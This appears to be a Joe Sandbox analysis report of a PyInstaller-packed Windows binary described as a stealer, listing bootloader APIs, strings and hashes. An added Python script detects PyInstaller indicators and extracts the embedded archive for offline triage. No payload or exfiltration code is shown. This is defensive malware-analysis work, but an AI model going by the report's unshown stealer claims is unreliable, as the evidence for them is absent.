calls 16156->16157 16158 7ff7ead17c91 16157->16158 16161 7ff7ead17d24 16158->16161 16159->16158 16160 7ff7ead17cef GetFullPathNameW 16159->16160 16160->16154 16160->16158 16164 7ff7ead17d98 memcpy_s 16161->16164 16165 7ff7ead17d4d __scrt_get_show_window_mode 16161->16165 16162 7ff7ead17d81 16163 7ff7ead14f08 _set_fmode 11 API calls 16162->16163 16169 7ff7ead17d86 16163->16169 16164->16144 16165->16162 16165->16164 16167 7ff7ead17dba 16165->16167 16166 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16166->16164 16167->16164 16168 7ff7ead14f08 _set_fmode 11 API calls 16167->16168 16168->16169 16169->16166 16173 7ff7ead205d0 16170->16173 16174 7ff7ead205fb 16173->16174 16175 7ff7ead20612 16173->16175 16178 7ff7ead14f08 _set_fmode 11 API calls 16174->16178 16176 7ff7ead20637 16175->16176 16177 7ff7ead20616 16175->16177 16211 7ff7ead1f5b8 16176->16211 16199 7ff7ead2073c 16177->16199 16181 7ff7ead20600 16178->16181 16185 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16181->16185 16183 7ff7ead2063c 16188 7ff7ead206e1 16183->16188 16194 7ff7ead20663 16183->16194 16184 7ff7ead2061f 16186 7ff7ead14ee8 _fread_nolock 11 API calls 16184->16186 16195 7ff7ead2060b __vcrt_freefls 16185->16195 16187 7ff7ead20624 16186->16187 16191 7ff7ead14f08 _set_fmode 11 API calls 16187->16191 16188->16174 16189 7ff7ead206e9 16188->16189 16192 7ff7ead17bd8 13 API calls 16189->16192 16190 7ff7ead0c550 _log10_special 8 API calls 16193 7ff7ead20731 16190->16193 16191->16181 16192->16195 16193->16144 16196 7ff7ead17c4c 14 API calls 16194->16196 16195->16190 16197 7ff7ead206a7 16196->16197 16197->16195 16198 7ff7ead17d24 37 API calls 16197->16198 16198->16195 16200 7ff7ead20786 16199->16200 16201 7ff7ead20756 16199->16201 16203 7ff7ead20771 16200->16203 16204 7ff7ead20791 GetDriveTypeW 16200->16204 16202 7ff7ead14ee8 _fread_nolock 11 API calls 16201->16202 16205 7ff7ead2075b 16202->16205 16207 7ff7ead0c550 _log10_special 8 API calls 16203->16207 16204->16203 16206 7ff7ead14f08 _set_fmode 
11 API calls 16205->16206 16208 7ff7ead20766 16206->16208 16209 7ff7ead2061b 16207->16209 16210 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16208->16210 16209->16183 16209->16184 16210->16203 16225 7ff7ead2a4d0 16211->16225 16213 7ff7ead1f5ee GetCurrentDirectoryW 16214 7ff7ead1f62c 16213->16214 16215 7ff7ead1f605 16213->16215 16216 7ff7ead1eb98 _set_fmode 11 API calls 16214->16216 16217 7ff7ead0c550 _log10_special 8 API calls 16215->16217 16218 7ff7ead1f63b 16216->16218 16219 7ff7ead1f699 16217->16219 16220 7ff7ead1f654 16218->16220 16221 7ff7ead1f645 GetCurrentDirectoryW 16218->16221 16219->16183 16223 7ff7ead14f08 _set_fmode 11 API calls 16220->16223 16221->16220 16222 7ff7ead1f659 16221->16222 16224 7ff7ead1a948 __free_lconv_num 11 API calls 16222->16224 16223->16222 16224->16215 16226 7ff7ead2a4c0 16225->16226 16226->16213 16226->16226 16228 7ff7ead1f755 16227->16228 16229 7ff7ead1f731 16227->16229 16231 7ff7ead1f78f 16228->16231 16234 7ff7ead1f7ae 16228->16234 16229->16228 16230 7ff7ead1f736 16229->16230 16232 7ff7ead14f08 _set_fmode 11 API calls 16230->16232 16233 7ff7ead14f08 _set_fmode 11 API calls 16231->16233 16235 7ff7ead1f73b 16232->16235 16236 7ff7ead1f794 16233->16236 16244 7ff7ead14f4c 16234->16244 16238 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16235->16238 16239 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16236->16239 16240 7ff7ead1f746 16238->16240 16241 7ff7ead1f79f 16239->16241 16240->15989 16241->15989 16242 7ff7ead1f7bb 16242->16241 16243 7ff7ead204dc 51 API calls 16242->16243 16243->16242 16245 7ff7ead14f70 16244->16245 16246 7ff7ead14f6b 16244->16246 16245->16246 16252 7ff7ead1b150 GetLastError 16245->16252 16246->16242 16253 7ff7ead1b191 FlsSetValue 16252->16253 16254 7ff7ead1b174 FlsGetValue 16252->16254 16256 7ff7ead1b1a3 16253->16256 16272 7ff7ead1b181 16253->16272 16255 7ff7ead1b18b 16254->16255 16254->16272 16255->16253 16258 7ff7ead1eb98 _set_fmode 11 API calls 16256->16258 16257 7ff7ead1b1fd SetLastError 
16259 7ff7ead14f8b 16257->16259 16260 7ff7ead1b21d 16257->16260 16261 7ff7ead1b1b2 16258->16261 16274 7ff7ead1d984 16259->16274 16282 7ff7ead1a504 16260->16282 16263 7ff7ead1b1d0 FlsSetValue 16261->16263 16264 7ff7ead1b1c0 FlsSetValue 16261->16264 16267 7ff7ead1b1dc FlsSetValue 16263->16267 16268 7ff7ead1b1ee 16263->16268 16266 7ff7ead1b1c9 16264->16266 16270 7ff7ead1a948 __free_lconv_num 11 API calls 16266->16270 16267->16266 16269 7ff7ead1aef4 _set_fmode 11 API calls 16268->16269 16271 7ff7ead1b1f6 16269->16271 16270->16272 16273 7ff7ead1a948 __free_lconv_num 11 API calls 16271->16273 16272->16257 16273->16257 16275 7ff7ead1d999 16274->16275 16276 7ff7ead14fae 16274->16276 16275->16276 16326 7ff7ead23304 16275->16326 16278 7ff7ead1d9f0 16276->16278 16279 7ff7ead1da18 16278->16279 16280 7ff7ead1da05 16278->16280 16279->16246 16280->16279 16339 7ff7ead22650 16280->16339 16291 7ff7ead23650 16282->16291 16317 7ff7ead23608 16291->16317 16322 7ff7ead202d8 EnterCriticalSection 16317->16322 16327 7ff7ead1b150 __GetCurrentState 45 API calls 16326->16327 16328 7ff7ead23313 16327->16328 16329 7ff7ead2335e 16328->16329 16338 7ff7ead202d8 EnterCriticalSection 16328->16338 16329->16276 16340 7ff7ead1b150 __GetCurrentState 45 API calls 16339->16340 16341 7ff7ead22659 16340->16341 20212 7ff7ead216b0 20223 7ff7ead273e4 20212->20223 20224 7ff7ead273f1 20223->20224 20225 7ff7ead1a948 __free_lconv_num 11 API calls 20224->20225 20226 7ff7ead2740d 20224->20226 20225->20224 20227 7ff7ead1a948 __free_lconv_num 11 API calls 20226->20227 20228 7ff7ead216b9 20226->20228 20227->20226 20229 7ff7ead202d8 EnterCriticalSection 20228->20229

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff7ead089e0-7ff7ead08b26 call 7ff7ead0c850 call 7ff7ead09390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7ead153f0 call 7ff7ead1a47c call 7ff7ead1871c call 7ff7ead153f0 call 7ff7ead1a47c call 7ff7ead1871c call 7ff7ead153f0 call 7ff7ead1a47c call 7ff7ead1871c GetCommandLineW CreateProcessW 23 7ff7ead08b28-7ff7ead08b48 GetLastError call 7ff7ead02c50 0->23 24 7ff7ead08b4d-7ff7ead08b89 RegisterClassW 0->24 32 7ff7ead08e39-7ff7ead08e5f call 7ff7ead0c550 23->32 26 7ff7ead08b8b GetLastError 24->26 27 7ff7ead08b91-7ff7ead08be5 CreateWindowExW 24->27 26->27 29 7ff7ead08be7-7ff7ead08bed GetLastError 27->29 30 7ff7ead08bef-7ff7ead08bf4 ShowWindow 27->30 31 7ff7ead08bfa-7ff7ead08c0a WaitForSingleObject 29->31 30->31 33 7ff7ead08c88-7ff7ead08c8f 31->33 34 7ff7ead08c0c 31->34 37 7ff7ead08c91-7ff7ead08ca1 WaitForSingleObject 33->37 38 7ff7ead08cd2-7ff7ead08cd9 33->38 36 7ff7ead08c10-7ff7ead08c13 34->36 40 7ff7ead08c1b-7ff7ead08c22 36->40 41 7ff7ead08c15 GetLastError 36->41 42 7ff7ead08ca7-7ff7ead08cb7 TerminateProcess 37->42 43 7ff7ead08df8-7ff7ead08e02 37->43 44 7ff7ead08cdf-7ff7ead08cf5 QueryPerformanceFrequency QueryPerformanceCounter 38->44 45 7ff7ead08dc0-7ff7ead08dd9 GetMessageW 38->45 40->37 46 7ff7ead08c24-7ff7ead08c41 PeekMessageW 40->46 41->40 51 7ff7ead08cb9 GetLastError 42->51 52 7ff7ead08cbf-7ff7ead08ccd WaitForSingleObject 42->52 49 7ff7ead08e11-7ff7ead08e35 GetExitCodeProcess CloseHandle * 2 43->49 50 7ff7ead08e04-7ff7ead08e0a DestroyWindow 43->50 53 7ff7ead08d00-7ff7ead08d38 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff7ead08ddb-7ff7ead08de9 TranslateMessage DispatchMessageW 45->47 48 7ff7ead08def-7ff7ead08df6 45->48 56 7ff7ead08c43-7ff7ead08c74 TranslateMessage DispatchMessageW PeekMessageW 46->56 57 
7ff7ead08c76-7ff7ead08c86 WaitForSingleObject 46->57 47->48 48->43 48->45 49->32 50->49 51->52 52->43 54 7ff7ead08d3a 53->54 55 7ff7ead08d73-7ff7ead08d7a 53->55 58 7ff7ead08d40-7ff7ead08d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->45 59 7ff7ead08d7c-7ff7ead08da5 QueryPerformanceCounter 55->59 56->56 56->57 57->33 57->36 58->55 58->58 59->53 60 7ff7ead08dab-7ff7ead08db2 59->60 60->43 61 7ff7ead08db4-7ff7ead08db8 60->61 61->45
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: 235a67f0b1412dbbdebda2e637d2da7591839ba84bc1f88a3a8e8885d7006363
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 81D19432A08A8286F710EF34E8943ADB765FF94B58F800276DA5D43A98DF7CD154C721

Control-flow Graph

Function 7ff7ead01000-7ff7ead04067 (bootloader entry, per the String IDs below): runtime initialisation and argument/environment handling through internal helpers, SetDllDirectoryW, LoadLibraryExW, PostMessageW and GetMessageW, a call to 7ff7ead089e0 (the hidden-window child-process routine) and the error and cleanup exits. Graph node and edge listing omitted.
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
• Instruction ID: 1110fc5f604bc3514105ae1ad6e894e3176ad781bc1424d71341d14022e255bb
• Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
• Instruction Fuzzy Hash: E9327C21A08A8291FB19F72594943F9A762EF54788FC440B7DA5D432CAEF7CE558C332
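The String IDs above (PyInstaller Onefile Hidden Window, _PYI_ARCHIVE_FILE, pyi-contents-directory, MEI, the temporary-directory error messages) identify the file as a PyInstaller onefile bundle: the grabber's Python payload lives in the CArchive appended to this bootloader, not in the PE's own code, and at run time it is unpacked into a temporary directory that the bootloader deletes on exit (the "Failed to remove temporary directory" path). The triage script below is an added example, not part of the Joe Sandbox report or of PyInstaller: it checks a buffer for those bootloader strings and then walks the CArchive cookie and table of contents so the embedded scripts can be pulled offline instead of from the transient %TEMP% directory. The `!8sIIii64s` cookie and `!iIIIBc` TOC entry layouts are PyInstaller's own archive format; `build_sample` constructs a synthetic onefile image for testing and is not derived from this sample.

```python
"""PyInstaller onefile triage: indicator strings plus a CArchive TOC walk (added example)."""
import struct
import zlib

# Bootloader strings the sandbox recovered from this sample (see String IDs above).
PYI_INDICATORS = [
    b"PyInstaller Onefile Hidden Window",
    b"_PYI_ARCHIVE_FILE",
    b"pyi-contents-directory",
    b"_PYI_PARENT_PROCESS_LEVEL",
]

# CArchive layout as defined by PyInstaller's archive reader (format facts, not from the report).
MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"                        # magic, pkg len, toc offset, toc len, pyver, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)        # 88 bytes, stored at the very end of the package
TOC_ENTRY_FMT = "!iIIIBc"                        # entry len, data offset, stored len, raw len, zlib flag, typecode
TOC_ENTRY_SIZE = struct.calcsize(TOC_ENTRY_FMT)  # 18 bytes, followed by the NUL-terminated entry name
TYPECODES = {b"s": "python script", b"z": "PYZ archive", b"b": "binary",
             b"x": "data", b"m": "module", b"M": "package"}


def find_indicators(data: bytes) -> list:
    """Return which of the known bootloader strings occur in the buffer."""
    return [s.decode() for s in PYI_INDICATORS if s in data]


def parse_carchive(data: bytes) -> dict:
    """Locate the CArchive cookie, then walk the table of contents and inflate each entry."""
    cookie_pos = data.rfind(MAGIC)               # the cookie is the last thing in the overlay
    if cookie_pos < 0:
        raise ValueError("no PyInstaller CArchive cookie found")
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, data[cookie_pos:cookie_pos + COOKIE_SIZE])
    pkg_start = cookie_pos + COOKIE_SIZE - pkg_len   # pkg_len covers the package including the cookie
    entries = []
    pos = pkg_start + toc_off
    end = pos + toc_len
    while pos < end:
        entry_len, off, stored_len, raw_len, zflag, typecode = struct.unpack(
            TOC_ENTRY_FMT, data[pos:pos + TOC_ENTRY_SIZE])
        name = data[pos + TOC_ENTRY_SIZE:pos + entry_len].rstrip(b"\x00").decode("utf-8", "replace")
        stored = data[pkg_start + off:pkg_start + off + stored_len]
        payload = zlib.decompress(stored) if zflag else stored
        if len(payload) != raw_len:
            raise ValueError(f"length mismatch for TOC entry {name!r}")
        entries.append({"name": name, "type": TYPECODES.get(typecode, typecode.decode()),
                        "compressed": bool(zflag), "data": payload})
        pos += entry_len
    return {"python_version": pyver, "pylib": pylib.rstrip(b"\x00").decode(), "entries": entries}


def build_sample(items) -> bytes:
    """Construct a synthetic onefile image (fake stub + package + TOC + cookie) for testing only."""
    stub = b"MZ" + b"\x00" * 64 + b"\x00".join(PYI_INDICATORS) + b"\x00"
    body, toc = bytearray(), bytearray()
    for name, typecode, compress, payload in items:
        stored = zlib.compress(payload) if compress else payload
        name_b = name.encode() + b"\x00"
        entry_len = (TOC_ENTRY_SIZE + len(name_b) + 15) // 16 * 16   # entries are 16-byte aligned
        toc += struct.pack(TOC_ENTRY_FMT, entry_len, len(body), len(stored), len(payload),
                           int(compress), typecode)
        toc += name_b.ljust(entry_len - TOC_ENTRY_SIZE, b"\x00")
        body += stored
    pkg_len = len(body) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(body), len(toc), 312,
                         b"python312.dll".ljust(64, b"\x00"))
    return stub + bytes(body) + bytes(toc) + cookie


if __name__ == "__main__":
    # Hypothetical entry names and contents; a real run would use open(path, "rb").read().
    sample = build_sample([("blank", b"s", True, b"import os\nprint('stolen')\n"),
                           ("python312.dll", b"b", False, b"MZ\x90\x00" * 4)])
    print("indicators:", find_indicators(sample))
    for e in parse_carchive(sample)["entries"]:
        print(f"{e['name']:16} {e['type']:14} {len(e['data'])} bytes")
```

On a real onefile binary, pass the whole file to `parse_carchive`; entries of type "python script" are the bundled entry-point scripts and "PYZ archive" is the compressed module bundle, which is where the stealer logic is found rather than in the bootloader functions shown in this report.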

Control-flow Graph

Function 7ff7ead26964-7ff7ead26d52 (CRT low-level file open): CreateFileW with a second CreateFileW attempt on the 7ff7ead26a8f path, GetFileType, GetLastError, CloseHandle, and a CloseHandle followed by CreateFileW again at 7ff7ead26c9c, with _invalid_parameter_noinfo error exits (per the API ID below). Graph node and edge listing omitted.
APIs
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: f9aed6a51e478cb4b00645d73990b07bc78f0d13bd230059b6e4c11a6b0e5bdb
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 6DC1D036B28B4285FB10EF64C4906AC7761F749B98F8142B6DE2E97398CF38D111C321

                                                                                                                                                                                                                              Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD0842B
• RemoveDirectoryW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084AE
• DeleteFileW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084CD
• FindNextFileW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084DB
• FindClose.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084EC
• RemoveDirectoryW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction ID: 583ef5b254f7ff1f7114440e18d99883d7db02a05b27b2c37a6eead3137a212d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4414121A0CA8285FA20EB24E4843BEB362FB94758FC00273D59D4269CEF7CE555C762
APIs
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: 8ce2ad7dbfd5054e07d43efbcfa513b8df1537611b836527035957cd2eb09776
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: 9DF0C232A1C74286F7A0DB60B4D8766B390FB84728F840336DA6D02AD8DF3CE058CA11

Control-flow Graph

APIs
  • Part of subcall function 00007FF7EAD07F90: _fread_nolock.LIBCMT ref: 00007FF7EAD0803A
• _fread_nolock.LIBCMT ref: 00007FF7EAD01A1B
  • Part of subcall function 00007FF7EAD02910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7EAD01B6A), ref: 00007FF7EAD0295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
• Instruction ID: 3adfd0fecca65c1dac41dd60b8d855fbfba640b4b7d0e82ba3b7333a87dcf31f
• Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
• Instruction Fuzzy Hash: 1C817271A0868686FB20FB24D0853B9E3A2EF48748F844477E98D4778DDE7CE585C762

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
• Instruction ID: 268be9953173299050babd1cc5b9ac8576ec22708eb0e55688078a03abb146f7
• Opcode Fuzzy Hash: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
• Instruction Fuzzy Hash: D851AE61A0864792FA10FB6194803B9E3A2FF84798FC445B3EE4C4779ADE3CE545C362

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD08704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0870A
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0874C
  • Part of subcall function 00007FF7EAD08830: GetEnvironmentVariableW.KERNEL32(00007FF7EAD0388E), ref: 00007FF7EAD08867
  • Part of subcall function 00007FF7EAD08830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7EAD08889
  • Part of subcall function 00007FF7EAD18238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD18251
  • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                              • Instruction ID: 3f3a38a82d29616b10cb8db9ac92c9c84d55e9d54d752fc36843bf9f2c64cb85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43419C61A1964244FA11F721A8A53FEA392EF98788FC001B3ED0D477DEDE7CE401C262

Control-flow Graph

